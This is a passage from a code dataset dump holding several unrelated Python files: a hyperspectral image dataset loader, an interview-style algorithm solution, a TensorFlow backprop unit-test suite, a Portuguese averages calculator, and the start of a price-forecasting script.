shrublands\",\r\n \"Acacia grasslands\", \"Short mopane\", \"Mixed mopane\",\r\n \"Exposed soils\"]\r\n\r\n ignored_labels = [0]\r\n\r\n elif dataset_name == 'KSC':\r\n # Load the image\r\n img = open_file(folder + 'KSC.mat')['KSC']\r\n\r\n rgb_bands = (43, 21, 11) # AVIRIS sensor\r\n\r\n gt = open_file(folder + 'KSC_gt.mat')['KSC_gt']\r\n label_values = [\"Undefined\", \"Scrub\", \"Willow swamp\",\r\n \"Cabbage palm hammock\", \"Cabbage palm/oak hammock\",\r\n \"Slash pine\", \"Oak/broadleaf hammock\",\r\n \"Hardwood swamp\", \"Graminoid marsh\", \"Spartina marsh\",\r\n \"Cattail marsh\", \"Salt marsh\", \"Mud flats\", \"Wate\"]\r\n\r\n ignored_labels = [0]\r\n\r\n elif dataset_name == 'Salinas':\r\n # Load the image\r\n img = open_file(folder + 'Salinas.mat')\r\n img = img['salinas_corrected']\r\n # img = open_file(folder + 'Salinas_PCA_30.mat')\r\n # img = img['q']\r\n\r\n rgb_bands = (55, 41, 12)\r\n\r\n gt = open_file(folder + 'Salinas_gt.mat')['salinas_gt']\r\n\r\n label_values = [\"Undefined\", \"Brocoli_green_weeds_1\", \"Brocoli_green_weeds_2\", \"Fallow\",\r\n \"Fallow_rough_plow\", \"Fallow_smooth\", \"Stubble\", \"Celery\",\r\n \"Grapes_untrained\", \"Soil_vinyard_develop\", \"Corn_senesced_green_weeds\", \"Lettuce_romaine_4wk\",\r\n \"Lettuce_romaine_5wk\", \"Lettuce_romaine_6wk\", \"Lettuce_romaine_7wk\",\r\n \"Vinyard_untrained\", \"Vinyard_vertical_trellis\"]\r\n\r\n ignored_labels = [0]\r\n\r\n else:\r\n # Custom dataset # 自定义数据\r\n img, gt, rgb_bands, ignored_labels, label_values, palette = CUSTOM_DATASETS_CONFIG[dataset_name]['loader'](\r\n folder)\r\n\r\n # Filter NaN out 检查数据中是否还有NaN数据\r\n nan_mask = np.isnan(img.sum(axis=-1)) # np.isnan() 返回的是一个数组,其中的值是对应输入数组对元素NaN判断的bool型数据\r\n if np.count_nonzero(nan_mask) > 0: # 意义为:数据中有NaN存在\r\n print(\r\n \"Warning: NaN have been found in the data. It is preferable to remove them beforehand. Learning on NaN data is disabled.\")\r\n img[nan_mask] = 0 # 将NaN型数据转成0\r\n gt[nan_mask] = 0\r\n ignored_labels.append(0)\r\n\r\n ori_img = img # 记录原始的img 和 gt\r\n ori_gt = gt\r\n # 将img镜像扩展patch size个像素,为了在最后输出的时候能够输出100%比例的分类图***\r\n img = cv2.copyMakeBorder(img, patch_size // 2, patch_size // 2, patch_size // 2, patch_size // 2,\r\n cv2.BORDER_REFLECT)\r\n gt = cv2.copyMakeBorder(gt, patch_size // 2, patch_size // 2, patch_size // 2, patch_size // 2, cv2.BORDER_REFLECT)\r\n\r\n ignored_labels = list(set(ignored_labels)) # set(list_a) 将list_a中的出现过的数据做成一个集合 如list = [1, 1, 3, 2, 3] --> {1, 2, 3}\r\n # Normalization\r\n img = np.asarray(img, dtype='float32')\r\n img = (img - np.min(img)) / (np.max(img) - np.min(img)) # 数据归一化\r\n # ori_img = np.asarray(ori_img, dtype='float32')\r\n # ori_img = (ori_img - np.min(ori_img)) / (np.max(ori_img) - np.min(ori_img)) # 数据归一化\r\n\r\n return img, gt, label_values, ignored_labels, rgb_bands, palette #, ori_img, ori_gt\r\n\r\n\r\nclass HyperX(torch.utils.data.Dataset):\r\n \"\"\" Generic class for a hyperspectral scene \"\"\"\r\n\r\n def __init__(self, data, gt, **hyperparams):\r\n \"\"\"\r\n Args:\r\n data: 3D hyperspectral image\r\n gt: 2D array of labels\r\n patch_size: int, size of the spatial neighbourhood\r\n center_pixel: bool, set to True to consider only the label of the\r\n center pixel\r\n data_augmentation: bool, set to True to perform random flips\r\n supervision: 'full' or 'semi' supervised algorithms\r\n \"\"\"\r\n super(HyperX, self).__init__()\r\n self.data = data\r\n self.label = gt\r\n self.name = hyperparams['dataset']\r\n self.patch_size = hyperparams['patch_size']\r\n self.ignored_labels = set(hyperparams['ignored_labels'])\r\n self.flip_augmentation = hyperparams['flip_augmentation']\r\n self.radiation_augmentation = hyperparams['radiation_augmentation']\r\n self.mixture_augmentation = hyperparams['mixture_augmentation']\r\n self.center_pixel = hyperparams['center_pixel']\r\n self.train_sample_extend = hyperparams['train_sample_extend'] # 样本扩展参数\r\n supervision = hyperparams['supervision']\r\n # Fully supervised : use all pixels with label not ignored\r\n if supervision == 'full':\r\n mask = np.ones_like(gt)\r\n for l in self.ignored_labels:\r\n mask[gt == l] = 0\r\n # Semi-supervised : use all pixels, except padding\r\n elif supervision == 'semi':\r\n mask = np.ones_like(gt) # 返回一个和gt一样大小的全1矩阵\r\n\r\n x_pos, y_pos = np.nonzero(mask) # 返回mask中非零值得索引值 即pix在图中的坐标\r\n p = self.patch_size // 2 # // 是向下取整的除法\r\n # z = []\r\n # sizes = x_pos.size\r\n # for i in range(1, sizes):\r\n # z.append(i)\r\n\r\n temp_indices = np.array([(x, y) for x, y in zip(x_pos, y_pos) if # pix的坐标位置\r\n x > p and x < data.shape[0] - p and y > p and y < data.shape[1] - p])\r\n\r\n\r\n self.indices = []\r\n for item_x, item_y in temp_indices:\r\n newitem= [item_x, item_y, 0]\r\n self.indices.append(newitem)\r\n newitem = [item_x, item_y, 1]\r\n self.indices.append(newitem)\r\n newitem = [item_x, item_y, 2]\r\n self.indices.append(newitem)\r\n\r\n # if self.train_sample_extend is True:\r\n # #self.indices = []\r\n # self.labels = []\r\n # for j in range(1, 4):\r\n # z = np.ones_like(x_pos)*j\r\n # indices_ = np.array([(x, y, z) for x, y, z in zip(x_pos, y_pos, z) if # pix的坐标位置 以及 是否进行\r\n # x > p and x < data.shape[0] - p and y > p and y < data.shape[1] - p]) # 对x,y坐标的限制\r\n # self.indices.append(indices_)\r\n\r\n self.labels = [self.label[x, y] for x, y, z in self.indices]\r\n # self.labels.append(labels)\r\n # self.labels = [self.label[x, y] for x, y in self.indices]\r\n np.random.shuffle(self.indices)\r\n\r\n # if self.train_sample_extend is True:\r\n # z = 1\r\n # self.indices_updown = np.array([(x, y, z) for x, y in zip(x_pos, y_pos, z) if # pix的坐标位置\r\n # x > p and x < data.shape[0] - p and y > p and y < data.shape[1] - p]) # 对x,y坐标的限制\r\n # self.labels_updown = [self.label[x, y] for x, y in self.indices_updown]\r\n # z = 2\r\n # self.indices_rl = np.array([(x, y, z) for x, y in zip(x_pos, y_pos, z) if # pix的坐标位置\r\n # x > p and x < data.shape[0] - p and y > p and y < data.shape[1] - p]) # 对x,y坐标的限制\r\n # self.labels_rl = [self.label[x, y] for x, y in self.indices_rl]\r\n # np.random.shuffle(self.indices_updown)\r\n # np.random.shuffle(self.indices_rl)\r\n\r\n @staticmethod\r\n def flip(*arrays, z): # 数据增强 之 翻转\r\n # horizontal = np.random.random() > 0.5 # 50% 几率\r\n # vertical = np.random.random() > 0.5\r\n if z is 1:\r\n arrays = [np.fliplr(arr) for arr in arrays] # 将数组在左右翻转\r\n if z is 2:\r\n arrays = [np.flipud(arr) for arr in arrays] # 上下翻转\r\n return arrays\r\n\r\n @staticmethod\r\n def radiation_noise(data, alpha_range=(0.9, 1.1), beta=1 / 25):\r\n alpha = np.random.uniform(*alpha_range)\r\n noise = np.random.normal(loc=0., scale=1.0, size=data.shape)\r\n return alpha * data + beta * noise\r\n\r\n def mixture_noise(self, data, label, beta=1 / 25):\r\n alpha1, alpha2 = np.random.uniform(0.01, 1., size=2)\r\n noise = np.random.normal(loc=0., scale=1.0, size=data.shape)\r\n data2 = np.zeros_like(data)\r\n for idx, value in np.ndenumerate(label):\r\n if value not in self.ignored_labels:\r\n l_indices = np.nonzero(self.labels == value)[0]\r\n l_indice = np.random.choice(l_indices)\r\n assert (self.labels[l_indice] == value)\r\n x, y = self.indices[l_indice]\r\n data2[idx] = self.data[x, y]\r\n return (alpha1 * data + alpha2 * data2) / (alpha1 + alpha2) + beta * noise\r\n\r\n def __len__(self):\r\n return len(self.indices)\r\n\r\n def __getitem__(self, i):\r\n x, y, z = self.indices[i] # 先获取坐标\r\n x1, y1 = x - self.patch_size // 2, y - self.patch_size // 2 # 计算出目标window\r\n x2, y2 = x1 + self.patch_size, y1 + self.patch_size\r\n\r\n data = self.data[x1:x2, y1:y2] # 读取window中的数据和类别\r\n label = self.label[x1:x2, y1:y2]\r\n\r\n if z // 3 is 1:\r\n data, label = self.flip(data, label, z=1) # 左右翻转\r\n if z // 3 is 2:\r\n data, label = self.flip(data, label, z=2) # 上下翻转\r\n # if self.flip_augmentation and self.patch_size > 1: # 数据增强 之 翻转\r\n # # Perform data augmentation (only on 2D patches)\r\n # data, label = self.flip(data, label)\r\n if self.radiation_augmentation and np.random.random() < 0.1: # 10%的概率加噪声\r\n data = self.radiation_noise(data)\r\n if self.mixture_augmentation and np.random.random() < 0.2: # 20%的概率加mixture噪声\r\n data = self.mixture_noise(data, label)\r\n\r\n # ***Copy the data into numpy arrays (PyTorch doesn't like numpy views)***\r\n data = np.asarray(np.copy(data).transpose((2, 0, 1)), dtype='float32')\r\n label = np.asarray(np.copy(label), dtype='int64')\r\n\r\n # ***Load the data into PyTorch tensors***\r\n data = torch.from_numpy(data)\r\n label = torch.from_numpy(label)\r\n # Extract the center label if needed\r\n if self.center_pixel and self.patch_size > 1:\r\n label = label[self.patch_size // 2, self.patch_size // 2] # 确定window中心点pix的label\r\n # Remove unused dimensions when we work with invidual spectrums\r\n elif self.patch_size == 1:\r\n data = data[:, 0, 0]\r\n label = label[0, 0]\r\n\r\n # Add a fourth dimension for 3D CNN\r\n #if self.patch_size > 1:\r\n # Make 4D data ((Batch x) Planes x Channels x Width x Height)\r\n # data = data.unsqueeze(0) # 在第(0)个维度的位置加一个维度\r\n return data, label\r\n","repo_name":"JarvenYi/CBW","sub_path":"datasets.py","file_name":"datasets.py","file_ext":"py","file_size_in_byte":18224,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"31"} +{"seq_id":"13277676582","text":"#coding=utf-8\nimport sys\n\nif __name__ == \"__main__\":\n # 读取第一行的n\n n = int(sys.stdin.readline().strip())\n ans = 0\n dayGrowth = []\n for i in range(n):\n # 读取每一行\n line = sys.stdin.readline().strip()\n # 把每一行的数字分隔后转化成int列表\n values = map(int, line.split())\n values = [i for i in values]\n if values[0] == 1: # from to\n # form a day growth rule\n if values[2] > len(dayGrowth):\n newDayGrowth = [float('-inf') for _ in range(values[2])]\n for i in range(len(dayGrowth)):\n newDayGrowth[i] = dayGrowth[i]\n for j in range(values[1] - 1, values[2]):\n if newDayGrowth[j] < values[3]:\n newDayGrowth[j] = values[3]\n dayGrowth = newDayGrowth\n if values[0] == 2: # activity\n ans += values[2]\n for i in range(len(dayGrowth)):\n if dayGrowth[i] == float('-inf'):\n dayGrowth[i] = 0\n ans += sum(dayGrowth)\n print(ans)","repo_name":"SuperMartinYang/learning_algorithm","sub_path":"interview_exam/souhu/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":1073,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"21159796139","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport numpy as np\n\nfrom tensorflow.python import pywrap_tensorflow\nfrom tensorflow.python.eager import backprop\nfrom tensorflow.python.eager import context\nfrom tensorflow.python.eager import custom_gradient\nfrom tensorflow.python.eager import imperative_grad\nfrom tensorflow.python.eager import tape\nfrom tensorflow.python.eager import test\nfrom tensorflow.python.framework import constant_op\nfrom tensorflow.python.framework import dtypes\nfrom tensorflow.python.framework import ops\nfrom tensorflow.python.framework import tensor_shape\nfrom tensorflow.python.ops import array_ops\nfrom tensorflow.python.ops import embedding_ops\nfrom tensorflow.python.ops import gradients\nfrom tensorflow.python.ops import math_ops\nfrom tensorflow.python.ops import nn_grad # pylint: disable=unused-import\nfrom tensorflow.python.ops import nn_ops\nfrom tensorflow.python.ops import random_ops\nfrom tensorflow.python.ops import resource_variable_ops\nfrom tensorflow.python.ops import variables\nfrom tensorflow.python.training import training\nfrom tensorflow.python.util import compat\n\n\nclass BackpropTest(test.TestCase):\n\n def testAggregateGradients(self):\n\n def fn(x):\n ind1 = constant_op.constant(np.array([0, 1]))\n ind2 = constant_op.constant(np.array([2, 3]))\n ind3 = constant_op.constant(np.array([1, 3]))\n # A mixture of IndexedSlices and dense tensor to aggregate.\n g1 = embedding_ops.embedding_lookup(x, ind1)\n g2 = embedding_ops.embedding_lookup(x, ind2)\n g3 = embedding_ops.embedding_lookup(x, ind3)\n g4 = math_ops.reduce_sum(x * constant_op.constant(2.0))\n return g1 * g2 * g3 * g4\n\n var_np = np.random.rand(4, 2).astype(np.float32)\n var = constant_op.constant(var_np)\n grad = backprop.gradients_function(fn, [0])(var)[0]\n grad = ops.convert_to_tensor(grad).numpy()\n\n with context.graph_mode(), self.test_session():\n tf_var = array_ops.constant(var_np, dtypes.float32)\n tf_ind1 = array_ops.constant([0, 1])\n tf_ind2 = array_ops.constant([2, 3])\n tf_ind3 = array_ops.constant([1, 3])\n tf_g1 = embedding_ops.embedding_lookup(tf_var, tf_ind1)\n tf_g2 = embedding_ops.embedding_lookup(tf_var, tf_ind2)\n tf_g3 = embedding_ops.embedding_lookup(tf_var, tf_ind3)\n tf_g4 = math_ops.reduce_sum(tf_var * 2.0, reduction_indices=(0, 1))\n tf_y = tf_g1 * tf_g2 * tf_g3 * tf_g4\n tf_grad = gradients.gradients(tf_y, [tf_var])[0]\n\n tf_dense_grad = math_ops.unsorted_segment_sum(\n tf_grad.values, tf_grad.indices, tf_grad.dense_shape[0])\n\n self.assertAllClose(grad, tf_dense_grad.eval())\n\n def testImplicitGradWithResourceVariable(self):\n x = resource_variable_ops.ResourceVariable(\n initial_value=constant_op.constant(1.0), name='x')\n\n def fn():\n tape.watch_variable(x)\n b = constant_op.constant(2.0)\n c = math_ops.add(x.value(), b)\n return math_ops.add(c, constant_op.constant(3.0))\n\n grads_and_vars = backprop.implicit_grad(fn)()\n self.assertAllEqual(grads_and_vars[0][0], 1.0)\n self.assertAllEqual(id(grads_and_vars[0][1]), id(x))\n\n def testDy(self):\n\n def f(x):\n return x\n\n grad_fn = backprop.gradients_function(f)\n self.assertAllEqual(2., grad_fn(1., dy=2.)[0])\n\n def testImplicitGradOverEmbeddingLookup(self):\n batch_size = 8\n embedding_size = 512\n vocab_size = 1000\n lrn_rate = 0.1\n random_init = random_ops.random_uniform([vocab_size, embedding_size])\n\n x = array_ops.ones((batch_size), dtypes.int64)\n embedding = resource_variable_ops.ResourceVariable(\n initial_value=random_init, dtype=dtypes.float32, name='embedding')\n\n def f():\n tape.watch_variable(embedding)\n embedded_x = embedding_ops.embedding_lookup(embedding, x)\n return constant_op.constant(1.0, dtypes.float32) - embedded_x\n\n grad = backprop.implicit_grad(f)()[0][0]\n opt = training.GradientDescentOptimizer(lrn_rate)\n\n with context.graph_mode(), self.test_session():\n tf_x = array_ops.ones((batch_size), dtypes.int64)\n # TODO(ashankar,apassos): Change to ResourceVariable.\n tf_embedding = variables.Variable(\n random_init.numpy(), name='tf_embedding')\n tf_embedded_x = embedding_ops.embedding_lookup(tf_embedding, tf_x)\n tf_y = 1.0 - tf_embedded_x\n tf_grad = gradients.gradients(tf_y, [tf_embedding])[0]\n tf_opt = training.GradientDescentOptimizer(0.1)\n tf_embedding.initializer.run()\n\n self.assertAllClose(tf_grad.indices.eval(), grad.indices)\n self.assertAllClose(tf_grad.values.eval(), grad.values)\n\n tf_opt.apply_gradients([(tf_grad, tf_embedding)]).run()\n expected = tf_embedding.eval()\n opt.apply_gradients([(grad, embedding)])\n self.assertAllClose(expected, embedding.read_value())\n\n def testGradientNone(self):\n\n def loss(x, l):\n return math_ops.reduce_mean(\n nn_ops.softmax_cross_entropy_with_logits(logits=x, labels=l),\n constant_op.constant([0]))\n\n logits = constant_op.constant([[0.0, 0.0]])\n labels = constant_op.constant([[1.0, 0.0]])\n # softmax_cross_entropy_with_logits returns two outputs and in this case the\n # gradient wrt the second is None.\n g, = backprop.gradients_function(loss, [0])(logits, labels)\n self.assertAllEqual(g.numpy(), [[-0.5, 0.5]])\n\n def testSecondGrad(self):\n\n def first(x):\n l = constant_op.constant([[0.0]])\n x = nn_ops.softmax_cross_entropy_with_logits(labels=l, logits=x)\n x = math_ops.reduce_sum(x, constant_op.constant([0]))\n return x\n\n def second(x):\n grad = backprop.gradients_function(first, [0])(x)[0]\n return math_ops.reduce_sum(grad, constant_op.constant([0]))\n\n f = constant_op.constant([[0.1]])\n grad = backprop.gradients_function(second, [0])(f)[0]\n self.assertAllEqual([[0.0]], grad)\n\n def testMakeVJP(self):\n\n def f(x):\n return x * x\n\n wrapped_fn = backprop.make_vjp(f)\n result, vjp = wrapped_fn(constant_op.constant(3.0))\n self.assertAllEqual(result, 9.0)\n self.assertAllEqual(vjp(2.0)[0], 12.0)\n\n def testGradGrad(self):\n\n def sq(x):\n return x * x\n\n def grad(x):\n value = backprop.gradients_function(sq, [0])(x)[0]\n return value\n\n gradgrad = backprop.gradients_function(grad, [0])\n\n self.assertAllEqual(gradgrad(constant_op.constant(3.0))[0], 2.0)\n\n def testGradGradExp(self):\n\n def grad(x):\n value = backprop.gradients_function(math_ops.exp, [0])(x)[0]\n return value\n\n gradgrad = backprop.gradients_function(grad, [0])\n\n self.assertAllEqual(gradgrad(constant_op.constant(0.0))[0], 1.0)\n\n def testGPU(self):\n if not context.context().num_gpus():\n self.skipTest('No GPUs found')\n\n def fn(x):\n with context.device('/gpu:0'):\n b = constant_op.constant(2.0)\n c = math_ops.add(x.gpu(), b)\n # TODO(apassos): remove cpu below by making TensorVSPace aware\n # of devices.\n return math_ops.add(c, constant_op.constant(3.0)).cpu()\n\n grad = backprop.gradients_function(fn, [0])(constant_op.constant(1.0))[0]\n self.assertAllEqual(grad, 1.0)\n\n def testGPUImplicitGrad(self):\n if not context.context().num_gpus():\n self.skipTest('No GPU found')\n with context.device('gpu:0'):\n v = resource_variable_ops.ResourceVariable(\n constant_op.constant(1.0), name='v')\n\n def f():\n with context.device('gpu:0'):\n tape.watch_variable(v)\n return v.read_value()\n\n self.assertEqual(\n backprop.implicit_grad(f)()[0][0].cpu().numpy(), 1.0)\n\n def testCPU(self):\n\n def fn(x):\n b = constant_op.constant(2.0)\n c = math_ops.add(x, b)\n return math_ops.add(c, constant_op.constant(3.0))\n\n grad = backprop.gradients_function(fn, [0])(constant_op.constant(1.0))[0]\n self.assertAllEqual(grad, 1.0)\n\n def testTensorCopyGPU2CPU2GPU(self):\n if not context.context().num_gpus():\n self.skipTest('No GPUs found')\n\n def f(a, b):\n return a.cpu() + b.cpu()\n\n with context.device('/gpu:0'):\n a = constant_op.constant(1.0)\n b = constant_op.constant(2.0)\n\n grad = backprop.gradients_function(f, [0])(a, b)[0]\n self.assertAllEqual(grad, 1.0)\n\n def testEmptyParams(self):\n\n def fn(a, b):\n return a * b\n\n x = constant_op.constant(1.0)\n y = constant_op.constant(2.0)\n dx, dy = backprop.gradients_function(fn)(x, y)\n self.assertAllEqual(dx, y.numpy())\n self.assertAllEqual(dy, x.numpy())\n\n def testUnconnectedNone(self):\n v = resource_variable_ops.ResourceVariable(\n 1.0, name='testUnconnectedNone')\n\n def f():\n v.read_value()\n return constant_op.constant(1.0)\n\n self.assertEqual(backprop.implicit_grad(f)()[0][0], None)\n\n def testGradientTape(self):\n with backprop.GradientTape() as g:\n x = constant_op.constant(3.0)\n g.watch(x)\n y = x * x\n with backprop.GradientTape() as gg:\n gg.watch(y)\n z = 2 * y\n inner_grad = gg.gradient(z, [y])[0]\n self.assertEqual(inner_grad.numpy(), 2.0)\n y += inner_grad\n grad = g.gradient(y, [x])[0]\n self.assertEqual(grad.numpy(), 6.0)\n\n def testGradientTapeVariable(self):\n v = resource_variable_ops.ResourceVariable(1.0, name='v')\n with backprop.GradientTape() as g:\n y = v * v\n grad = g.gradient(y, [v])[0]\n self.assertAllEqual(grad, 2.0)\n\n def testEmptyParamsForValueAndGradFunction(self):\n def fn(a, b):\n return a * b\n val_and_grads_fn = backprop.val_and_grad_function(fn)\n\n x = 2.0\n y = 3.0\n val, (dx, dy) = val_and_grads_fn(x, y)\n self.assertAllClose(val, x * y)\n self.assertAllEqual(dx, y)\n self.assertAllEqual(dy, x)\n\n def testNonEmptyParamsForValueAndGradFunction(self):\n def fn(a, b):\n return a * b\n val_and_grad_fn = backprop.val_and_grad_function(fn, params=[1])\n\n x = 2.0\n y = 3.0\n val, grads = val_and_grad_fn(x, y)\n self.assertAllClose(val, x * y)\n self.assertEqual(1, len(grads))\n self.assertAllEqual(grads[0], x)\n\n def testTensorCopyCPU2GPU2CPU(self):\n if not context.context().num_gpus():\n self.skipTest('No GPUs found')\n\n # forward: a (cpu->gpu) -> add (gpu) -> c (gpu->cpu) -> add (cpu) -> e (cpu)\n # back: e (cpu) -> add (cpu) -> c (cpu->gpu) -> add (gpu) -> grad (gpu->cpu)\n def f(a, b):\n with context.device('/gpu:0'):\n c = math_ops.add(a.gpu(0), b.gpu(0))\n return math_ops.add(c.cpu(), constant_op.constant(3.0))\n\n with context.device('/cpu:0'):\n a = constant_op.constant(1.0)\n b = constant_op.constant(2.0)\n\n grad = backprop.gradients_function(f, [0])(a, b)[0]\n self.assertAllEqual(grad, 1.0)\n\n def testGetAttrType(self):\n typ = backprop.op_attr_type('Add', 'T')\n self.assertEqual(typ, pywrap_tensorflow.TF_ATTR_TYPE)\n\n def testGetAttrList(self):\n typ = backprop.op_attr_type('MaxPool', 'ksize')\n self.assertEqual(typ, [pywrap_tensorflow.TF_ATTR_INT])\n\n def testMakeAttrType(self):\n self.assertEqual(dtypes.float32,\n backprop.make_attr(pywrap_tensorflow.TF_ATTR_TYPE, 1))\n\n def testMakeAttrTypeList(self):\n self.assertEqual([dtypes.float32],\n backprop.make_attr([pywrap_tensorflow.TF_ATTR_TYPE], [1]))\n\n def testMulType(self):\n\n def mul(x):\n return math_ops._mul_dispatch(x, x) # pylint: disable=protected-access\n\n self.assertAllEqual(\n backprop.gradients_function(mul)(3.0)[0].numpy(),\n 6.0)\n\n def testMakeAttrShape(self):\n for s in ([], None, [1, 2, 3], [None, None], [1, None, 3]):\n expected = tensor_shape.TensorShape(s).as_proto()\n actual = backprop.make_attr(pywrap_tensorflow.TF_ATTR_SHAPE, s)\n self.assertEqual(\n expected,\n actual,\n msg=('For shape %r, expected %r != %r actual' % (s, expected,\n actual)))\n\n def testMakeAttrShapeList(self):\n shape_list = [[], None, [1, 2, 3], [None, None], [1, None, 3]]\n self.assertEqual(\n [tensor_shape.TensorShape(s).as_proto() for s in shape_list],\n backprop.make_attr([pywrap_tensorflow.TF_ATTR_SHAPE], shape_list))\n\n def testArgsGradientFunction(self):\n\n def f(*args):\n return args[0] * args[0]\n\n grad = backprop.gradients_function(f)\n self.assertAllEqual(grad(1.0)[0], 2.0)\n\n def testExceptionSafety(self):\n\n def f(unused_x):\n raise ValueError()\n\n try:\n backprop.gradients_function(f)(1.0)\n except ValueError:\n pass\n\n def real_f(x):\n return x * x\n\n self.assertAllEqual(backprop.gradients_function(real_f)(1.0)[0], 2.0)\n\n def testMultiValueConvertToTensor(self):\n x = resource_variable_ops.ResourceVariable(\n initial_value=array_ops.constant([1.0]), name='x')\n\n def fn():\n tape.watch_variable(x)\n a = math_ops.add(x.value(), 1.0)\n # Make sure convert_to_tensor works correctly with list of TensorNodes.\n b = array_ops.stack([a, a], axis=0)\n return math_ops.reduce_mean(b)\n\n grad = backprop.implicit_grad(fn)()[0][0]\n self.assertAllEqual([1.0], grad)\n\n def testOutput(self):\n\n def multiout(x):\n return x + 2, x * x\n\n x = constant_op.constant([0.0, 1.0, 2.0])\n\n grad = backprop.gradients_function(multiout)(x)[0]\n self.assertAllEqual([1.0, 3.0, 5.0], grad)\n\n def testMultiValuePreservesIfNotDiffedAgainst(self):\n\n def tfe_conv2d(timage, tkernel, conv2dstrides):\n return nn_ops.conv2d(timage, tkernel, conv2dstrides, 'SAME')\n\n i = constant_op.constant([[[[1.0]]]])\n k = constant_op.constant([[[[2.0]]]])\n s = [1, 1, 1, 1]\n\n grad = backprop.gradients_function(tfe_conv2d, params=(0,))(i, k, s)[0]\n self.assertAllEqual([[[[2.0]]]], grad)\n\n def testSameObjectForMultipleArguments(self):\n\n def f(x, y):\n return math_ops.multiply(x, y)\n\n g = backprop.gradients_function(f)\n\n def np_g(x, y):\n dx, dy = g(x, y)\n return [dx.numpy(), dy.numpy()]\n\n x = constant_op.constant(1.)\n self.assertAllEqual([1., 1.], np_g(x, x))\n x = 1.\n self.assertAllEqual([1., 1.], np_g(x, x))\n x = constant_op.constant([[1.]])\n self.assertAllEqual([[[1.]], [[1.]]], np_g(x, x))\n x = [[1.]]\n self.assertAllEqual([[[1.]], [[1.]]], np_g(x, x))\n\n v = resource_variable_ops.ResourceVariable(\n initial_value=1., name='testSameObjectForMultipleArguments.Variable')\n self.assertAllEqual([1., 1.], np_g(v, v))\n\n def testEarlyGradAggregation(self):\n # Needs to be a list so mutations by the callback affect this function.\n add_n = []\n def callback(op_type, unused_1, unused_2, unused_3, unused_4):\n if compat.as_bytes(op_type) == compat.as_bytes('AddN'):\n add_n.append(1)\n context.context().add_post_execution_callback(callback)\n\n v = resource_variable_ops.ResourceVariable(constant_op.constant(2.0),\n name='v')\n def fn():\n outputs = []\n for _ in range(20):\n outputs.append(v * constant_op.constant(2.0))\n return math_ops.add_n(outputs)\n\n # By default the aggregation count is 2.\n _ = backprop.implicit_grad(fn)()[0][1]\n self.assertEqual(len(add_n), 2)\n del add_n[:]\n\n # Reduce the aggregation limit, cause the backprop to do some\n # early aggregation.\n # pylint: disable=protected-access\n old_cnt = imperative_grad._MIN_AGGREGATE_COUNT\n old_bytes = imperative_grad._MIN_AGGREGATE_BYTES\n imperative_grad._MIN_AGGREGATE_COUNT = 10\n imperative_grad._MIN_AGGREGATE_BYTES = 1\n _ = backprop.implicit_grad(fn)()\n self.assertEqual(len(add_n), 6)\n del add_n[:]\n\n # Aggregation is also limited by the memory.\n imperative_grad._MIN_AGGREGATE_BYTES = 10000\n _ = backprop.implicit_grad(fn)()\n self.assertEqual(len(add_n), 2)\n\n imperative_grad._MIN_AGGREGATE_COUNT = old_cnt\n imperative_grad._MIN_AGGREGATE_BYTES = old_bytes\n # pylint: enable=protected-access\n context.context().clear_post_execution_callbacks()\n\n def testImplicitGradientsCustomGradientAndCachedVariableValue(self):\n\n @custom_gradient.custom_gradient\n def my_square(x):\n result = math_ops.square(x)\n\n def grad(dr):\n return 2 * dr * x + 1\n\n return result, grad\n\n x = resource_variable_ops.ResourceVariable(\n initial_value=3, name='X.' + self.id())\n\n def f():\n return my_square(x)\n\n g = backprop.implicit_grad(f)\n\n grads_and_vars = g()\n self.assertEqual(1, len(grads_and_vars))\n grad, var = grads_and_vars[0]\n self.assertAllEqual(7, grad)\n self.assertAllEqual(x, var)\n\n def testCustomGradient(self):\n\n @custom_gradient.custom_gradient\n def my_mul(x, y):\n result = x*y\n\n def grad(dr):\n return [dr*y, dr*x]\n return result, grad\n\n lr = 0.25\n x = resource_variable_ops.ResourceVariable(2., name='x')\n\n def loss(x):\n return my_mul(2., x.read_value())\n\n loss_grads_fn = backprop.implicit_val_and_grad(loss)\n\n losses = []\n for _ in range(5):\n loss, grads_and_vars = loss_grads_fn(x)\n losses.append(loss.numpy())\n for (grad, var) in grads_and_vars:\n var.assign_sub(lr*grad)\n self.assertAllEqual(losses, [4.0, 3., 2., 1., 0.])\n\nif __name__ == '__main__':\n test.main()\n","repo_name":"benoitsteiner/tensorflow-opencl","sub_path":"tensorflow/python/eager/backprop_test.py","file_name":"backprop_test.py","file_ext":"py","file_size_in_byte":17253,"program_lang":"python","lang":"en","doc_type":"code","stars":468,"dataset":"github-code","pt":"31"} +{"seq_id":"41113210074","text":"x = int(input('Informe o primeiro valor: '))\ny = int(input('Informe o segundo valor: '))\nz = int(input('Informe o terceiro valor: '))\nop = input('Agora informe uma letra conforme a tabela:\\n(a)Geométrica\\n(b)Ponderada\\n(c)Harmômica\\n(d)Aritmética\\n')\n\nif x > 0:\n if y > 0:\n if z > 0:\n if op == 'a':\n geo = pow(x*y*z, 1/3)\n print('A resultante da funçao geometrica: ', geo)\n elif op == 'b':\n pond = x+2*y+3*z\n print('A media ponderada é: ', pond)\n elif op == 'c':\n harm = 1/(1/x+1/y+1/z)\n print('O resultado da função harmonica é: ', harm)\n elif op == 'd':\n arit = (x+y+z)/3\n print('A media aritmética é: ', arit)\n else:\n pass\n else:\n print('Informe o terceiro valor positivo.')\n else:\n print('Informe o segundo valor positivo')\nelse:\n print('Informe o primeiro valor inteiro positivo.')\n","repo_name":"LeandroLuna/Python","sub_path":"off80.py","file_name":"off80.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"21367415889","text":"import pandas as pd\nimport os\nfrom pyparsing import col\nfrom sklearn.neural_network import MLPRegressor\nimport numpy as np\nimport pickle\nfrom sklearn.preprocessing import MinMaxScaler\n\ncwd = os.getcwd()\n\npath_datos = os.path.join(cwd, \"data_lake/business/precios-diarios.csv\")\npath_archivo = os.path.join(cwd, \"data_lake/business/features/precios_diarios.csv\")\npath_modelo = os.path.join(cwd, \"src/models/precios-diarios.pkl\")\npath_salida = os.path.join(cwd, \"data_lake/business/forecasts/precios-diarios.csv\")\n\n\ndef make_forecasts():\n \"\"\"Construya los pronosticos con el modelo entrenado final.\n\n Cree el archivo data_lake/business/forecasts/precios-diarios.csv. Este\n archivo contiene tres 